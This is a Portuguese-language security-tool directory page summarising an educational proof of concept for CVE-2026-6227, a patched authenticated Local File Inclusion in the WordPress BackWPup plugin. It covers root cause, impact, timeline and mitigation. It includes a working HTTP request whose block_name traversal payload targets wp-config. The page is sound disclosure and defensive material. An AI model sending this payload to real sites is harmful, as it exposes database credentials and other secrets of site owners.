Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-6227 — Prova de conceito educacional para CVE-2026-6227, uma Inclusão de Arquivo Local autenticada no plugin WordPress BackWPup, incluindo análise da causa raiz, requisição de exploração e orientações de mitigação. | Kitploit
Ferramentas/GitHubGitHub/pixel-defaultbr/cve-2026-6227
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebPapers e PesquisaAprendizado e Educação
GitHubpixel-defaultbr/cve-2026-6227

CVE-2026-6227

Prova de conceito educacional para CVE-2026-6227, uma Inclusão de Arquivo Local autenticada no plugin WordPress BackWPup, incluindo análise da causa raiz, requisição de exploração e orientações de mitigação.

Ver Repositório
1há 5 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-6227: Inclusão de Arquivo Local no BackWPup

CVSS Version Researcher

Resumo do Aviso

As versões do BackWPup até e incluindo a 5.6.6 são afetadas por uma vulnerabilidade de Inclusão de Arquivo Local (LFI) autenticada por meio do parâmetro block_name do endpoint REST /wp-json/backwpup/v1/getblock.

A falha foi causada pela sanitização não recursiva de sequências de travessia com str_replace() e já foi corrigida na versão 5.6.7.

Metadados

  • CVE: CVE-2026-6227
  • Gravidade: Alta
  • Pontuação CVSS: 7.2
  • Produto Afetado: Plugin WordPress BackWPup
  • Versões Afetadas: <= 5.6.6
  • Versão Corrigida: 5.6.7
  • Status: Corrigido
  • Data de Divulgação: 2026-04-13
  • Pesquisador: Pixel_DefaultBR
  • Aviso Legal

    Este repositório é estritamente para fins educacionais e de pesquisa ética em segurança. As informações fornecidas aqui têm como objetivo ajudar administradores e equipes de segurança a verificar seus sistemas. Não use isto contra alvos sem permissão explícita e por escrito.

    Superfície Afetada

    • Função: BackWPupHelpers::component()
    • Endpoint: POST /wp-json/backwpup/v1/getblock
    • Parâmetro: block_name
    • Nível de Acesso: Administrador Autenticado (ou usuários com permissões de backup delegadas)

    Análise da Causa Raiz

    O carregador de componentes vulnerável aplica uma sanitização não recursiva com str_replace() antes de invocar include(). Isso pode ser contornado usando padrões de travessia elaborados, como ....// ou ..././, permitindo a resolução de caminhos controlada pelo atacante.

    Impacto

    • Inclusão arbitrária de arquivos PHP locais do sistema de arquivos do servidor
    • Potencial exposição de dados sensíveis (por exemplo, wp-config.php)
    • Possível execução remota de código em configurações específicas de servidor/aplicação

    Por padrão, a exploração requer acesso de nível administrador. Se as permissões de backup forem delegadas, usuários com privilégios menores também podem se tornar capazes de explorar este problema.

    Pré-condições de Exploração

    • Sessão WordPress autenticada válida
    • Nonce REST válido
    • Privilégios de administrador ou permissões de backup delegadas

    Prova de Conceito

    Cenário: Inclusão de Arquivo Local

    1. Faça login no WordPress usando uma conta com a capacidade de trabalho do BackWPup.
    2. Dispare uma solicitação normal pela interface do plugin e intercepte o tráfego com um proxy.
    3. Localize uma solicitação POST legítima para /wp-json/backwpup/v1/getblock.
    4. Substitua block_name por um payload de travessia.

    Exemplo de solicitação:

    root@kitploit:~
    POST /wp-json/backwpup/v1/getblock HTTP/1.1
    Host: target.example.com
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-WP-Nonce: <your_nonce_here>
    Cookie: wordpress_logged_in_<hash>=<your_session_cookie>
    
    block_name=....//....//....//....//wp-config&block_type=component&block_data%5Btype%5D=success&block_data%5Bfont%5D=small&block_data%5Bdismiss_icon%5D=true&block_data%5Bcontent%5D=You+scheduled+a+new+backup+successfully!
    
    1. Observe a resposta para verificar o comportamento de inclusão de arquivo.

    Linha do Tempo

    • 2026-03: Vulnerabilidade relatada ao fornecedor
    • 2026-03-25: Correção do fornecedor lançada na versão 5.6.7
    • 2026-04-13: Divulgação pública (CVE-2026-6227)

    Mitigação

    • Atualize o BackWPup para a versão 5.6.7 ou posterior
    • Restrinja a atribuição da capacidade backwpup apenas a funções confiáveis
    • Revise os logs de auditoria em busca de acesso suspeito a /wp-json/backwpup/v1/getblock

    Referências

    • Página do plugin do fornecedor: https://wordpress.org/plugins/backwpup/
    • Referência CVE (Wordfence): https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/backwpup/backwpup-566-authenticated-administrator-local-file-inclusion-via-block-name-parameter
    Baixar ferramenta